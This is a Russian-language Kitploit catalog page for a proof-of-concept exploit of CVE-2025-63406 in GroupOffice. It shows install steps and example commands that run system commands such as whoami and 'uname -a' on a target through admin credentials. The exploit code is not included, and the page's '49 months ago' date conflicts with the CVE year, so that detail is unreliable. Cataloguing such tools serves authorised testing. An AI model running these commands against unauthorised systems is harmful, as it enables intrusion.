Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxvh1337/cve-2025-63406-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubnxvh1337/cve-2025-63406-poc

CVE-2025-63406-PoC

Небольшой PoC для автоматизации эксплуатации уязвимости CVE-2025-63406.

Репозиторий
49 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-63406 PoC

Установка

root@kitploit:~
# Install dependencies
pip install -r requirements.txt

# Or use a virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install -r requirements.txt

Использование

root@kitploit:~
python3 CVE-2025-63406.py -u <URL> -n <USERNAME> -p <PASSWORD> -c <COMMAND>

Аргументы

  • -u, --url: Базовый URL экземпляра GroupOffice (например, http://localhost:9090)
  • -n, --username: Имя пользователя для аутентификации
  • -p, --password: Пароль для аутентификации
  • -c, --command: Системная команда для выполнения (например, whoami, id, ls -la)

Примеры

root@kitploit:~
# Execute whoami command
python3 CVE-2025-63406.py -u http://localhost:9090 -n admin -p password -c whoami

# Execute id command
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c id

# List files in current directory
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "ls -la"

# Get system information
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "uname -a"

Пример использования с командой id Пример использования с командой "uname -a"

Отказ от ответственности

⚠️ Этот инструмент предназначен только для авторизованного тестирования. Несанкционированный доступ к компьютерным системам является незаконным.

Скачать инструмент